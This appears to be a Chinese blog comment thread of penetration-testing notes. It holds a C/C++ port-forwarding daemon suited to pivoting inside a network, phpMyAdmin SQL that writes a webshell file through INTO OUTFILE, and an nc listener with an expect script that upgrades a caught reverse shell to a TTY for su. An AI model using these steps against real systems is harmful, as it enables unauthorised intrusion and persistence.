评论: 用nst的反弹后后门连上nc后不能su交互的解决方法+内网渗透测试笔记

4,ie没sock5设置。我都是用firefox的。

Posted by hello at May 7, 2009 01:16 AM

老点的ie版本有这个选项,新版的中文ie的话就是“套接字”那项;另opera里面没有这个

Posted by vitter at May 7, 2009 01:19 PM

sockscap,呵呵
linux下用proxy-chain

Posted by xi4oyu at June 7, 2009 05:02 PM

读取配置文件/etc/portmap.conf,代码如下:

#include <ctype.h>
#include <errno.h>
#include <signal.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <syslog.h>
#include <unistd.h>
#include <pthread.h>
#include <arpa/inet.h>
#include <netinet/in.h>
#include <sys/select.h>
#include <sys/socket.h>
#include <sys/types.h>

#include <algorithm>
#include <map>

/* One forwarding destination: the host/port that a connection accepted on a
 * local listening port is relayed to. Filled in by readconf(), read by doit(). */
typedef struct desc_addr
{
int port;        /* destination TCP port in host byte order (doit() applies htons()) */
char ip[32];     /* destination IPv4 address as dotted-quad text, handed to inet_addr();
                    NOTE(review): readconf() fills it with strncpy(..., 32), which does not
                    guarantee a terminator, while doit() strcpy()s it - keep it NUL-terminated */
} DESC_ADDR;

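/* Relay body for one direction: copy bytes from p[0] to p[1] until the source
 * reaches EOF or either socket fails, then half-close the destination so its
 * peer sees EOF too.
 *
 * p must point to an int[2] {from_fd, to_fd} that outlives the call (doit()
 * passes a stack array and waits for the relay before returning).
 * Always returns NULL; the return type exists only to fit pthread_create(). */
void* work( void *p )
{
    char buffer[8192];
    const int *spair = static_cast<const int *>(p);
    const int from = spair[0];
    const int to = spair[1];

    for (;;)
    {
        /* ssize_t, not size_t: recv() returns -1 on error, which a size_t
         * turns into a huge positive count, so the original loop never
         * terminated on error and forwarded an undefined length. */
        ssize_t len = recv(from, buffer, sizeof(buffer), 0);
        if (len < 0 && errno == EINTR)
            continue;
        if (len <= 0)
            break;                     /* 0 = orderly EOF, <0 = hard error */

        /* send() may write fewer bytes than requested even on a blocking
         * socket (e.g. when interrupted), so push the whole chunk out. */
        size_t off = 0;
        bool failed = false;
        while (off < static_cast<size_t>(len))
        {
            ssize_t sent = send(to, buffer + off, static_cast<size_t>(len) - off, 0);
            if (sent < 0)
            {
                if (errno == EINTR)
                    continue;
                failed = true;
                break;
            }
            off += static_cast<size_t>(sent);
        }
        if (failed)
            break;
    }

    /* Only the write direction is closed: the relay running the opposite
     * direction still reads from 'to', and the owning process closes the fds. */
    shutdown(to, SHUT_WR);
    return NULL;
}

/* Listening socket fd -> local port it was bound to (filled by mybind(), read by doit()). */
std::map<int, int> map_s2p;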
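/* Local port -> listening socket fd (filled by mybind(), read by main() and doit()). */
std::map<int, int> map_p2s;
/* Local port -> forwarding destination (filled by readconf(), read by doit()). */
std::map<int, DESC_ADDR> port_map;
/* Highest listening socket fd registered so far; upper bound for select() in main(). */
int max_sock = 0;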

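/* Create a TCP listening socket on every interface (INADDR_ANY) for 'port' and
 * register it in map_p2s / map_s2p / max_sock for the select() loop in main().
 *
 * Every failure (bad port, duplicate port, socket/bind/listen error, fd too
 * large for select()) is logged to syslog and leaves the maps untouched, so a
 * bad configuration line cannot register a half-set-up socket. */
void mybind(int port)
{
    if (port <= 0 || port > 65535)
    {
        syslog(LOG_ERR, "mybind: port %d out of range", port);
        return;
    }
    if (map_p2s.count(port))
    {
        /* insert() below would silently fail and the new socket would leak. */
        syslog(LOG_ERR, "mybind: port %d already bound", port);
        return;
    }

    struct sockaddr_in svr_addr;
    memset(&svr_addr, 0, sizeof(svr_addr));
    svr_addr.sin_family = AF_INET;
    svr_addr.sin_port = htons(port);
    svr_addr.sin_addr.s_addr = INADDR_ANY;

    const int svr_sock = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);
    if (svr_sock < 0)
    {
        syslog(LOG_ERR, "mybind port=%d socket: %s", port, strerror(errno));
        return;
    }
    /* FD_SET() on an fd >= FD_SETSIZE is undefined behaviour in main()'s loop. */
    if (svr_sock >= FD_SETSIZE)
    {
        syslog(LOG_ERR, "mybind port=%d: fd %d exceeds FD_SETSIZE", port, svr_sock);
        close(svr_sock);
        return;
    }

    int optval = 1;
    /* Best effort: a failed SO_REUSEADDR only delays restarts after a crash. */
    setsockopt(svr_sock, SOL_SOCKET, SO_REUSEADDR, &optval, sizeof(optval));

    if (bind(svr_sock, (struct sockaddr *)&svr_addr, sizeof(svr_addr)) != 0
        || listen(svr_sock, 5) != 0)
    {
        syslog(LOG_ERR, "mybind port=%d bind/listen: %s", port, strerror(errno));
        close(svr_sock);
        return;
    }

    map_p2s.insert(std::make_pair(port, svr_sock));
    map_s2p.insert(std::make_pair(svr_sock, port));
    max_sock = std::max(max_sock, svr_sock);
}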

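/* Accept one pending connection on listening socket 'svr_sock' and fork a child
 * that connects to the configured destination and relays both directions
 * (one pthread per direction via work()). The parent only logs and closes its
 * copy of the accepted socket.
 *
 * Every return path in the parent closes the accepted socket; every exit path
 * in the child is _exit(), because returning would drop the child back into
 * main()'s select()/accept loop next to the parent (the original did exactly
 * that: the forked child had no exit after work()). */
void doit(int svr_sock)
{
    int s = accept(svr_sock, 0, 0);
    if (-1 == s)
        return;

    /* find() instead of operator[]: a lookup miss must not insert a 0 entry. */
    std::map<int, int>::const_iterator pit = map_s2p.find(svr_sock);
    if (pit == map_s2p.end())
    {
        close(s);
        return;
    }
    const int port = pit->second;
    std::map<int, DESC_ADDR>::const_iterator ait = port_map.find(port);
    if (ait == port_map.end())
    {
        syslog(LOG_ERR, "doit: no destination configured for port %d", port);
        close(s);
        return;
    }
    const DESC_ADDR addr = ait->second;   /* copy, so the child owns its data */

    /* addr.ip is not guaranteed NUL-terminated by the config reader; copy with
     * an explicit bound and terminator instead of strcpy(). */
    char ipbuffer[32];
    memcpy(ipbuffer, addr.ip, sizeof(ipbuffer) - 1);
    ipbuffer[sizeof(ipbuffer) - 1] = '\0';

    struct sockaddr_in peer;
    socklen_t peer_len = sizeof(peer);
    if (0 != getpeername(s, (struct sockaddr *)&peer, &peer_len))
    {
        close(s);   /* the original returned here without closing s */
        return;
    }
    /* inet_ntop() into a local buffer rather than inet_ntoa()'s static one. */
    char srcbuf[INET_ADDRSTRLEN];
    const char *src = inet_ntop(AF_INET, &peer.sin_addr, srcbuf, sizeof(srcbuf));
    syslog(LOG_INFO, "doit src=%s, dest=%s", src ? src : "?", ipbuffer);

    const pid_t pid = fork();
    if (pid < 0)
    {
        syslog(LOG_ERR, "doit fork: %s", strerror(errno));
        close(s);
        return;
    }
    if (pid != 0)
    {
        /* Parent: the child owns the relay; drop our copy and go back to select(). */
        close(s);
        return;
    }

    /* Child from here on. */
    struct sockaddr_in cli_addr;
    memset(&cli_addr, 0, sizeof(cli_addr));
    cli_addr.sin_family = AF_INET;
    cli_addr.sin_port = htons(addr.port);
    if (inet_pton(AF_INET, ipbuffer, &cli_addr.sin_addr) != 1)
    {
        syslog(LOG_ERR, "doit: bad destination address '%s'", ipbuffer);
        _exit(1);
    }
    const int cli_sock = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);
    if (cli_sock < 0
        || connect(cli_sock, (struct sockaddr *)&cli_addr, sizeof(cli_addr)) != 0)
    {
        /* The original relayed into an unconnected socket when connect() failed. */
        syslog(LOG_ERR, "doit connect %s:%d: %s", ipbuffer, addr.port, strerror(errno));
        _exit(1);
    }

    int spair0[2], spair1[2];
    spair1[1] = spair0[0] = s;          /* client -> destination */
    spair1[0] = spair0[1] = cli_sock;   /* destination -> client */
    pthread_t t1;
    if (pthread_create(&t1, NULL, work, spair0) != 0)
    {
        syslog(LOG_ERR, "doit pthread_create failed");
        _exit(1);
    }
    work(spair1);
    pthread_join(t1, NULL);   /* let the other direction drain before the process ends */
    _exit(0);
}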

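/* Load forwarding rules from /etc/portmap.conf and bind a listener for each.
 *
 * Line format: "<local_port> <dest_ip> <dest_port>"; '#' starts a comment and
 * blank lines are skipped. A line is used only if all three fields parse, both
 * ports are in 1..65535, the address is a valid dotted-quad and the local port
 * is not already mapped; anything else is logged and ignored. (The original
 * accepted partial lines, so a malformed rule bound port 0 - a kernel-chosen
 * port - and forwarded to an unparseable address.)
 *
 * A missing or unreadable file is logged and loads nothing. */
void readconf(void)
{
    FILE *fp = fopen("/etc/portmap.conf", "r");
    if (fp == NULL)
    {
        syslog(LOG_ERR, "readconf: cannot open /etc/portmap.conf: %s", strerror(errno));
        return;
    }

    char line[1024];
    int lineno = 0;
    while (fgets(line, sizeof(line), fp) != NULL)
    {
        ++lineno;

        /* Cut at the FIRST '#': the original used strrchr(), which kept the
         * text before the last '#' when a line held more than one. */
        char *hash = strchr(line, '#');
        if (hash)
            *hash = '\0';

        char *s = line;
        while (isspace((unsigned char)*s))
            ++s;
        if (*s == '\0')
            continue;

        int local_port = 0;
        int desc_port = 0;
        char ipbuf[32] = {};
        /* %31s bounds the token: an unbounded %s into a 32-byte buffer is a
         * stack overflow for any over-long address field. */
        if (sscanf(s, "%d %31s %d", &local_port, ipbuf, &desc_port) != 3
            || local_port <= 0 || local_port > 65535
            || desc_port <= 0 || desc_port > 65535)
        {
            syslog(LOG_ERR, "readconf: ignoring malformed line %d", lineno);
            continue;
        }
        struct in_addr parsed;
        if (inet_pton(AF_INET, ipbuf, &parsed) != 1)
        {
            syslog(LOG_ERR, "readconf: ignoring line %d, bad address '%s'", lineno, ipbuf);
            continue;
        }
        if (port_map.count(local_port))
        {
            syslog(LOG_ERR, "readconf: ignoring line %d, port %d already mapped", lineno, local_port);
            continue;
        }

        DESC_ADDR addr;
        addr.port = desc_port;
        /* ipbuf holds at most 31 characters, so the copy is always terminated;
         * the explicit terminator keeps that true if the buffer sizes drift. */
        strncpy(addr.ip, ipbuf, sizeof(addr.ip));
        addr.ip[sizeof(addr.ip) - 1] = '\0';
        port_map.insert(std::make_pair(local_port, addr));
        mybind(local_port);
    }

    fclose(fp);   /* the original never closed the handle */
}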

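/* Daemon entry point: detach, ignore the signals that would otherwise kill the
 * relay, load the rules, then multiplex all listening sockets with select()
 * and hand each ready one to doit(). Runs until killed. Returns non-zero only
 * if detaching fails or no listener could be set up. */
int main(int argc, char **argv)
{
    (void)argc;
    (void)argv;

    if (daemon(0, 0) != 0)
    {
        perror("daemon");
        return 1;
    }
    signal(SIGCHLD, SIG_IGN);   /* relay children are reaped automatically */
    /* A relay writing to a peer that already went away would otherwise be
     * killed by SIGPIPE instead of seeing send() fail and shutting down cleanly. */
    signal(SIGPIPE, SIG_IGN);

    readconf();
    if (map_p2s.empty())
    {
        /* select() on an empty set would just sleep in 30s steps forever. */
        syslog(LOG_ERR, "no listening sockets configured, exiting");
        return 1;
    }

    for (;;)
    {
        fd_set rfds;
        FD_ZERO(&rfds);
        /* Walk port->socket directly. The original indexed map_p2s[] by every
         * port in port_map, so a rule whose bind failed default-inserted fd 0
         * into the set, and a readable fd 0 made the loop spin in doit(). */
        for (std::map<int, int>::const_iterator iter = map_p2s.begin(); iter != map_p2s.end(); ++iter)
            FD_SET(iter->second, &rfds);

        struct timeval tv;
        tv.tv_sec = 30;
        tv.tv_usec = 0;
        const int retval = select(max_sock + 1, &rfds, NULL, NULL, &tv);

        if (retval == -1)
        {
            if (errno == EINTR)
                continue;
            syslog(LOG_ERR, "select retval = -1: %s", strerror(errno));
            /* A persistent failure (e.g. EBADF) would otherwise flood the log. */
            sleep(1);
        }
        else if (retval > 0)
        {
            for (int s = 0; s <= max_sock; ++s)
                if (FD_ISSET(s, &rfds))
                    doit(s);
        }
    }
}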

Posted by vitter at June 8, 2009 02:57 PM

phpmyadmin的写webshell
1.访问 : http://url/phpmyadmin/libraries/select_lang.lib.php 得到物理路径.
2.选择一个Database.运行以下语句.
Create TABLE a (cmd text NOT NULL);
Insert INTO a (cmd) VALUES('');
select cmd from a into outfile '/usr/local/Apache2/htdocs/phpMyAdmin/test.php';
Drop TABLE IF EXISTS a;

Posted by vitter at September 1, 2009 10:10 AM

$ cat sh.exp
#!/usr/bin/expect
# Spawn a shell, then allow the user to interact with it.
# The new shell will have a good enough TTY to run tools like ssh, su and login
spawn sh
interact
$ nc -v -n -l -p 1234
listening on [any] 1234 ...
connect to [127.0.0.1] from (UNKNOWN) [127.0.0.1] 48257
sh: no job control in this shell
sh-3.2$ su -
su: must be run from a terminal
sh-3.2$ expect sh.exp
spawn sh
sh-3.2$ su -
Password: mypassword
localhost ~ #
用Expect也可以得到tty。

Posted by vitter at December 29, 2010 10:29 AM